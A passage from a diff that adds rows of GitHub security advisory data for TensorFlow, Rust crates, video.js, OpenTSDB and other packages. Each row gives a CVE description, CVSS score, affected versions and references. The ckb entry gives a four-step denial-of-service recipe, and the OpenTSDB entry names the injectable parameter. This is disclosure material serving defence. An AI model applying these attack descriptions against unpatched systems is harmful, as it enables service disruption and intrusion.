+This vulnerability has been reported externally via a [fixing PR](https://github.com/tensorflow/tensorflow/pull/50508).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-cmgw-8vpc-rc59'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37692'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/pull/50508'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/8721ba96e5760c229217b594f6d2ba332beedf22'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T18:47:39Z', 'nvd_published_at': '2021-08-12T23:15:00Z'}"
+1.4.0,GHSA-48vq-8jqv-gm6f,2021-08-02T21:53:41Z,2021-08-25T21:01:23Z,,[],Remote memory exhaustion in ckb,"In the ckb sync protocol, SyncState maintains a HashMap called 'misbehavior' that keeps a score of a peer's violations of the protocol. This HashMap is keyed to PeerIndex (an alias for SessionId), and entries are never removed from it. SessionId is an integer that increases monotonically with every new connection.
+
+A remote attacker can manipulate this HashMap to grow forever, resulting in degraded performance and ultimately a panic on allocation failure or being killed by the OS, depending on the platform.
+
+This is a critical severity security bug. It could be exploited to create a targeted or network-wide denial of service, to reduce the hash power of the network as part of a 51% attack, and perhaps in other creative ways.
+
+An attack is trivial:
+
+1. connect to another node
+2. send an invalid sync protocol request, such as `SendHeaders` for non-consecutive blocks
+3. disconnect
+4. repeat",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'ckb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.40.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/nervosnetwork/ckb/security/advisories/GHSA-48vq-8jqv-gm6f'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0108.html'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-02T21:53:41Z', 'nvd_published_at': None}"
+1.4.0,GHSA-x2xg-6wcj-6xf9,2021-08-24T20:08:25Z,2021-08-25T14:49:48Z,,['CVE-2020-36474'],SafeCurl before 0.9.2 has a DNS rebinding vulnerability.,SafeCurl before 0.9.2 has a DNS rebinding vulnerability.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'vanilla/safecurl'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.9.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36474'}, {'type': 'WEB', 'url': 'https://github.com/vanilla/safecurl/pull/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/vanilla/safecurl/'}, {'type': 'WEB', 'url': 'https://github.com/vanilla/safecurl/releases/tag/v0.9.2'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T20:08:25Z', 'nvd_published_at': '2021-08-20T15:15:00Z'}"
+1.4.0,GHSA-2v78-j59h-fmpf,2023-06-13T21:04:31Z,2021-08-25T20:43:23Z,,['CVE-2018-21000'],Heap overflow or corruption in safe-transmute,"Affected versions of this crate switched the length and capacity arguments in the Vec::from_raw_parts() constructor, which could lead to memory corruption or data leakage.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'safe-transmute'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.4.0'}, {'fixed': '0.10.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-21000'}, {'type': 'WEB', 'url': 'https://github.com/nabijaczleweli/safe-transmute-rs/pull/36'}, {'type': 'WEB', 'url': 'https://github.com/nabijaczleweli/safe-transmute-rs/commit/a134e06d740f9d7c287f74c0af2cd06206774364'}, {'type': 'PACKAGE', 'url': 'https://github.com/nabijaczleweli/safe-transmute-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2018-0013.html'}]","{'cwe_ids': ['CWE-119'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:24:31Z', 'nvd_published_at': None}"
+1.4.0,GHSA-686h-j8r8-wmfm,2021-08-24T17:53:47Z,2021-08-25T20:57:14Z,,['CVE-2020-36451'],Data races in rcu_cell,"Affected versions of this crate unconditionally implement Send/Sync for `RcuCell`.
+This allows users to send `T: !Send` to other threads (while `T` enclosed within `RcuCell`), and allows users to concurrently access `T: !Sync` by using the APIs of `RcuCell` that provide access to `&T`.
+
+This can result in memory corruption caused by data races.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'rcu_cell'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36451'}, {'type': 'WEB', 'url': 'https://github.com/Xudong-Huang/rcu_cell/issues/3'}, {'type': 'WEB', 'url': 'https://github.com/Xudong-Huang/rcu_cell/pull/4'}, {'type': 'WEB', 'url': 'https://github.com/Xudong-Huang/rcu_cell/pull/4/commits/1faf18eee11f14969b77ae0f76dcd9ebd437d0c2'}, {'type': 'PACKAGE', 'url': 'https://github.com/Xudong-Huang/rcu_cell'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0131.html'}]","{'cwe_ids': ['CWE-362', 'CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T20:29:49Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}"
+1.4.0,GHSA-79wf-qcqv-r22r,2021-08-18T21:21:03Z,2021-08-25T20:56:00Z,,['CVE-2021-38196'],Remote code execution in better-macro,"An issue was discovered in the better-macro crate through 2021-07-22 for Rust. It intentionally demonstrates that remote attackers can execute arbitrary code via proc-macros, and otherwise has no legitimate purpose.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'better-macro'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-38196'}, {'type': 'PACKAGE', 'url': 'https://github.com/raycar5/better-macro'}, {'type': 'WEB', 'url': 'https://github.com/raycar5/better-macro/blob/24ff1702397b9c19bbfa4c660e2316cd77d3b900/src/lib.rs#L36-L38'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0077.html'}]","{'cwe_ids': ['CWE-78', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T21:21:03Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}"
+1.4.0,GHSA-2xpg-3hx4-fm9r,2021-08-19T17:44:08Z,2021-08-25T20:53:20Z,,['CVE-2021-26957'],Out of bounds read in xcb,"An issue was discovered in the xcb crate through 2021-02-04 for Rust. It has a soundness violation because there is an out-of-bounds read in xcb::xproto::change_property(), as demonstrated by a format=32 T=u8 situation where out-of-bounds bytes are sent to an X server.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'xcb'}, 'ecosystem_specific': {'affected_functions': ['xcb::xproto::change_property']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26957'}, {'type': 'WEB', 'url': 'https://github.com/RustSec/advisory-db/issues/653'}, {'type': 'PACKAGE', 'url': 'https://github.com/rtbo/rust-xcb'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0019.html'}]","{'cwe_ids': ['CWE-125'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:44:08Z', 'nvd_published_at': None}"
+1.4.0,GHSA-g4w7-3qr8-5623,2021-08-19T21:18:44Z,2021-08-25T20:47:01Z,,['CVE-2020-35872'],Improper type usage in rusqlite,An issue was discovered in the rusqlite crate before 0.23.0 for Rust. Memory safety can be violated via the repr(Rust) type.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'rusqlite'}, 'ecosystem_specific': {'affected_functions': ['rusqlite::Connection::get_aux', 'rusqlite::Connection::set_aux', 'rusqlite::session::Session::attach', 'rusqlite::session::Session::diff', 'rusqlite::trace::log', 'rusqlite::vtab::create_module']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.23.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35872'}, {'type': 'WEB', 'url': 'https://github.com/rusqlite/rusqlite/commit/71b2f5187b0cbace3f8b6ff53432ff2ca0defcf0'}, {'type': 'PACKAGE', 'url': 'https://github.com/rusqlite/rusqlite'}, {'type': 'WEB', 'url': 'https://github.com/rusqlite/rusqlite/releases/tag/0.23.0'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0014.html'}]","{'cwe_ids': ['CWE-351'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:18:44Z', 'nvd_published_at': '2020-12-31T10:15:00Z'}"
+1.4.0,GHSA-pp7m-6j83-m7r6,2021-08-31T21:01:29Z,2021-08-10T16:09:36Z,,['CVE-2021-23414'],Cross-site Scripting in video.js,"This affects the package video.js before 7.14.3.
+ The src attribute of track tag allows to bypass HTML escaping and execute arbitrary code.
+
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'video.js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.14.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23414'}, {'type': 'WEB', 'url': 'https://github.com/videojs/video.js/commit/b3acf663641fca0f7a966525a72845af7ec5fab2'}, {'type': 'PACKAGE', 'url': 'https://github.com/videojs/video.js'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2DHYIIAUXUBHMBEDYU7TYNZXEN2W2SA2/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/74SXNGA5RIWM7QNX7H3G7SYIQLP4UUGV/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NLRJB5JNKK3VVBLV3NH3RI7COEDAXSAB/'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1533588'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1533587'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-VIDEOJS-1533429'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-02T18:36:58Z', 'nvd_published_at': '2021-07-28T08:15:00Z'}"
+1.4.0,GHSA-7cjc-hvxf-gqh7,2021-08-19T21:18:16Z,2021-08-25T20:47:39Z,,['CVE-2020-35862'],Use after free and double free in bitvec,An issue was discovered in the bitvec crate before 0.17.4 for Rust. BitVec to BitBox conversion leads to a use-after-free or double free.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'bitvec'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.11.0'}, {'fixed': '0.17.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35862'}, {'type': 'WEB', 'url': 'https://github.com/myrrlyn/bitvec/issues/55'}, {'type': 'PACKAGE', 'url': 'https://github.com/myrrlyn/bitvec'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0007.html'}]","{'cwe_ids': ['CWE-415', 'CWE-416'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:18:16Z', 'nvd_published_at': None}"
+1.4.0,GHSA-hv53-q76c-7f8c,2021-07-26T18:11:42Z,2021-08-02T17:02:21Z,,['CVE-2020-35476'],OS Command Injection in OpenTSDB,A remote code execution vulnerability occurs in OpenTSDB through 2.4.0 via command injection in the yrange parameter. The yrange value is written to a gnuplot file in the /tmp directory. This file is then executed via the mygnuplot.sh shell script. (tsd/GraphHandler.java attempted to prevent command injections by blocking backticks but this is insufficient.),"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'net.opentsdb:opentsdb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35476'}, {'type': 'WEB', 'url': 'https://github.com/OpenTSDB/opentsdb/issues/2051'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/170331/OpenTSDB-2.4.0-Command-Injection.html'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T18:11:42Z', 'nvd_published_at': '2020-12-16T08:15:00Z'}"
+1.4.0,GHSA-4x25-pvhw-5224,2023-06-13T16:41:15Z,2021-08-25T20:44:20Z,,['CVE-2019-16143'],Algorithms compute incorrect results in blake2,"An issue was discovered in the blake2 crate before 0.8.1 for Rust. The BLAKE2b and BLAKE2s algorithms, when used with HMAC, produce incorrect results because the block sizes are half of the required sizes.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'blake2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.8.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-16143'}, {'type': 'WEB', 'url': 'https://github.com/RustCrypto/MACs/issues/19'}, {'type': 'PACKAGE', 'url': 'https://github.com/RustCrypto/hashes/tree/master/blake2'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0019.html'}]","{'cwe_ids': ['CWE-327'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:22:54Z', 'nvd_published_at': '2019-09-09T12:15:00Z'}"
+1.4.0,GHSA-p24j-h477-76q3,2021-09-09T16:57:53Z,2021-08-25T21:01:37Z,,['CVE-2021-36753'],Uncontrolled Search Path Element in sharkdp/bat,bat on windows before 0.18.2 executes programs named less.exe from the current working directory. This can lead to unintended code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'bat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.18.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36753'}, {'type': 'WEB', 'url': 'https://github.com/sharkdp/bat/pull/1724'}, {'type': 'WEB', 'url': 'https://github.com/sharkdp/bat/commit/bf2b2df9c9e218e35e5a38ce3d03cffb7c363956'}, {'type': 'PACKAGE', 'url': 'https://github.com/sharkdp/bat'}, {'type': 'WEB', 'url': 'https://github.com/sharkdp/bat/releases/tag/v0.18.2'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0106.html'}, {'type': 'WEB', 'url': 'https://vuln.ryotak.me/advisories/53'}]","{'cwe_ids': ['CWE-427'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-19T16:44:50Z', 'nvd_published_at': '2021-07-15T20:15:00Z'}"
+1.4.0,GHSA-vjmg-pc8h-p6p8,2021-08-19T17:22:11Z,2021-08-25T20:53:58Z,,['CVE-2021-28308'],Out of bounds read in fltk,An issue was discovered in the fltk crate before 0.15.3 for Rust. There is an out-of bounds read because the pixmap constructor lacks pixmap input validation.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'fltk'}, 'ecosystem_specific': {'affected_functions': ['fltk::image::Pixmap::new']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.15.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28308'}, {'type': 'WEB', 'url': 'https://github.com/MoAlyousef/fltk-rs/issues/519'}, {'type': 'PACKAGE', 'url': 'https://github.com/MoAlyousef/fltk-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0038.html'}]","{'cwe_ids': ['CWE-125'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:22:11Z', 'nvd_published_at': None}"
+1.4.0,GHSA-h45v-vgvp-3h5v,2023-06-13T20:54:35Z,2021-08-25T20:49:13Z,,['CVE-2020-35895'],Out-of-bounds write in stack,"ArrayVec::insert allows insertion of an element into the array object into the specified index. Due to a missing check on the upperbound of this index, it is possible to write out of bounds.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'stack'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35895'}, {'type': 'WEB', 'url': 'https://github.com/arcnmx/stack-rs/issues/4'}, {'type': 'WEB', 'url': 'https://github.com/arcnmx/stack-rs/commit/369e55736f9bd29c37b1712afc2923f4028148c6'}, {'type': 'PACKAGE', 'url': 'https://github.com/arcnmx/stack-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0042.html'}]","{'cwe_ids': ['CWE-787'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T20:53:42Z', 'nvd_published_at': '2020-12-31T10:15:00Z'}"
+1.4.0,GHSA-84rm-qf37-fgc2,2021-08-19T17:35:19Z,2021-08-25T20:52:21Z,,['CVE-2021-23841'],Integer Overflow in openssl-src,"Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument in some cases where the input length is close to the maximum permissable length for an integer on the platform. In such cases the return value from the function call will be 1 (indicating success), but the output length value will be negative. This could cause applications to behave incorrectly or crash. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'openssl-src'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '111.14.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23841'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf'}, {'type': 'WEB', 'url': 'https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=122a19ab48091c657f7cb1fb3af9fc07bd557bbf'}, {'type': 'WEB', 'url': 'https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1'}, {'type': 'WEB', 'url': 'https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8252ee4d90f3f2004d3d0aeeed003ad49c9a7807'}, {'type': 'WEB', 'url': 'https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2'}, {'type': 'PACKAGE', 'url': 'https://github.com/alexcrichton/openssl-src-rs'}, {'type': 'WEB', 'url': 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0058'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0058.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202103-03'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210219-0009/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210513-0002/'}, {'type': 'WEB', 'url': 'https://support.apple.com/kb/HT212528'}, {'type': 'WEB', 'url': 'https://support.apple.com/kb/HT212529'}, {'type': 'WEB', 'url': 'https://support.apple.com/kb/HT212534'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4855'}, {'type': 'WEB', 'url': 'https://www.openssl.org/news/secadv/20210216.txt'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/tns-2021-03'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/tns-2021-09'}, {'type': 'WEB', 'url': 'http://seclists.org/fulldisclosure/2021/May/67'}, {'type': 'WEB', 'url': 'http://seclists.org/fulldisclosure/2021/May/68'}, {'type': 'WEB', 'url': 'http://seclists.org/fulldisclosure/2021/May/70'}]","{'cwe_ids': ['CWE-190', 'CWE-476'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:35:19Z', 'nvd_published_at': '2021-02-16T17:15:00Z'}"
+1.4.0,GHSA-gp6w-ccqv-p7qr,2021-08-24T20:06:36Z,2021-08-25T14:49:58Z,,['CVE-2021-3729'],firefly-iii is vulnerable to Cross-Site Request Forgery (CSRF),firefly-iii is vulnerable to Cross-Site Request Forgery (CSRF),"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'grumpydictator/firefly-iii'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.6.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3729'}, {'type': 'WEB', 'url': 'https://github.com/firefly-iii/firefly-iii/commit/06d319cd71b7787aa919b3ba1ccf51e4ade67712'}, {'type': 'PACKAGE', 'url': 'https://github.com/firefly-iii/firefly-iii/'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/d32f3d5a-0738-41ba-89de-34f2a772de76'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T20:06:36Z', 'nvd_published_at': '2021-08-23T13:15:00Z'}"
+1.4.0,GHSA-wcxc-jf6c-8rx9,2021-08-18T20:24:24Z,2021-08-25T20:57:21Z,,[], Uncaught Exception in libpulse-binding,"Affected versions of this crate failed to catch panics crossing FFI boundaries via callbacks, which
+is a form of UB. This flaw was corrected by [this commit][1] which was included in version 2.6.0.",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'libpulse-binding'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jnqnfe/pulse-binding-rust/commit/7fd282aef7787577c385aed88cb25d004b85f494'}, {'type': 'PACKAGE', 'url': 'https://github.com/jnqnfe/pulse-binding-rust'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0038.html'}]","{'cwe_ids': ['CWE-248'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T20:24:24Z', 'nvd_published_at': None}"
+1.4.0,GHSA-3mf3-2gv9-h39j,2023-06-13T18:44:34Z,2021-08-25T20:53:14Z,,['CVE-2021-26308'],Uninitialized buffer use in marc,"Affected versions of this crate passes an uninitialized buffer to a user-provided Read implementation. (Record::read()). Arbitrary Read implementations can read from the uninitialized buffer (memory exposure) and also can return incorrect number of bytes written to the buffer. Reading from uninitialized memory produces undefined values that can quickly invoke undefined behavior. This flaw was fixed in commit 6299af0 by zero-initializing the newly allocated memory (via data.resize(len, 0)) instead of exposing uninitialized memory (unsafe { data.set_len(len) }).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'marc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26308'}, {'type': 'WEB', 'url': 'https://github.com/blackbeam/rust-marc/issues/7'}, {'type': 'WEB', 'url': 'https://github.com/blackbeam/rust-marc/commit/6299af0'}, {'type': 'PACKAGE', 'url': 'https://github.com/blackbeam/rust-marc'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0014.html'}]","{'cwe_ids': ['CWE-908'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:52:28Z', 'nvd_published_at': None}"
+1.4.0,GHSA-jwph-qp5h-f9wj,2021-08-24T18:33:33Z,2021-08-25T20:59:18Z,,['CVE-2020-36450'],Data races in bunch,"An issue was discovered in the bunch crate through 2020-11-12 for Rust.
+Affected versions of this crate unconditionally implements `Send`/`Sync` for `Bunch`.
+This allows users to insert `T: !Sync` to `Bunch`. It is possible to create a data race to a `T: !Sync` by invoking the `Bunch::get()` API (which returns `&T`) from multiple threads. It is also possible to send `T: !Send` to other threads by inserting `T` inside `Bunch` and sending `Bunch` to another thread, allowing to create a data race by inserting types like `T = Rc<_>`.
+
+Such data races can lead to memory corruption.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'bunch'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36450'}, {'type': 'WEB', 'url': 'https://github.com/krl/bunch/issues/1'}, {'type': 'PACKAGE', 'url': 'https://github.com/krl/bunch'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/bunch/RUSTSEC-2020-0130.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0130.html'}]","{'cwe_ids': ['CWE-362', 'CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-09T21:34:27Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}"
